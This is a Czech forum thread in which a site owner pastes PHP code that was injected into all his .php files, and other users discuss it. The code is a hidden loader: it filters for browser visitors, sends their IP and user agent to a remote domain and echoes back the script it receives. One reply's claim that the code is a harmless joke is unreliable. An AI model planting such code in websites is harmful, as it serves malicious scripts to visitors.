| Autor | Zpráva | ||
|---|---|---|---|
| Mr. Stoolky Profil * |
#1 · Zasláno: 6. 5. 2015, 13:45:35
Zdravím,
vytvářím webové stránky v php s redakčním systémem. Dnes jsem se chtěl pustit do dalších úprav a najednou jsem viděl v php souborech řetězce, které jsem tam nedal já. <?php
#28d6a5#
error_reporting(0); @ini_set('display_errors',0); $wp_v13 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_v13) && !preg_match ('/bot/i', $wp_v13))){
$wp_v0913="."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_v13]http://"."html"."option".".com/"."option"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_v13);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_v0913); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_13v = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_13v = @file_get_contents($wp_v0913);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_13v=@stream_get_contents(@fopen($wp_v0913, "r"));}}
if (substr($wp_13v,1,3) === 'scr'){ echo $wp_13v; }
#/28d6a5#
?> |
||
| sitole Profil |
#2 · Zasláno: 6. 5. 2015, 14:39:19
Ahoj, kde jsi tento kod měl přesně napsaný? Index?
Dále také kde v souboru? <head> <body> Tady máš přímé řešení :) Virus na webu Cituji! "Někdo z lidí, kteří znají přístupové údaje k FTP účtu vašeho webu, má zavirovaný počítač. Virus si u své oběti přečetl heslo, které následně poslal jiné zavirované mašině (obvykle v zahraničí), ta se pravidelně připojuje k vašemu FTP účtu a pečlivě klade škodlivý kód do všech stránek, kde to dává smysl. Nakladené svinstvo se pak pokouší zneužít bezpečnostní díry prohlížečů a zavirovat stroj vašeho návštěvníka." |
||
| Mr. Stoolky Profil * |
#3 · Zasláno: 6. 5. 2015, 14:53:35
Bylo to ve všech .php souborech. Ten kód nevím k čemu slouží, vypadá to, že je to stavěné na wordpress. Na tom mi ale web neběží...
Jinak díky za odkázané vlákno. |
||
| sitole Profil |
#4 · Zasláno: 6. 5. 2015, 15:19:43
Mr. Stoolky:
Tak není možné že jednoduše přišlaaktualizace? :) |
||
| Mr. Stoolky Profil * |
#5 · Zasláno: 6. 5. 2015, 20:48:22
sitole:
Jakou aktualizaci myslíte? Aktualizace čeho? |
||
| snazimse Profil |
#6 · Zasláno: 6. 5. 2015, 22:49:30
Mr. Stoolky:
Ten kód, podle mě ani nefunguje správně, na řádku 5 je syntaktická chyba. Vypadá to asi opravdu na vir, ale nemá to žádné předpoklady k tomu, aby se to dalo použít, vypadá to na spíš na hloupý žert. Mě to žádný smysl nedává, že by to mělo fungovat správně. |
||
| Mr. Stoolky Profil * |
#7 · Zasláno: 7. 5. 2015, 13:55:13
snazimse:
Díky, aspoň mě to uklidnilo :) |
||
| sitole Profil |
#8 · Zasláno: 7. 5. 2015, 15:47:29
Mr. Stoolky:
Říkal jsi, že to jede na WP.. Tam někdy příjdou aktualizace.. |
||
| MONTYCEK Profil |
#9 · Zasláno: 7. 5. 2015, 22:22:20
sitole:
ale Mr. Stoolky psal "že je to stavěné na wordpress. Na tom mi ale web neběží... " |
||
|
Časová prodleva: 9 let
|
|||
0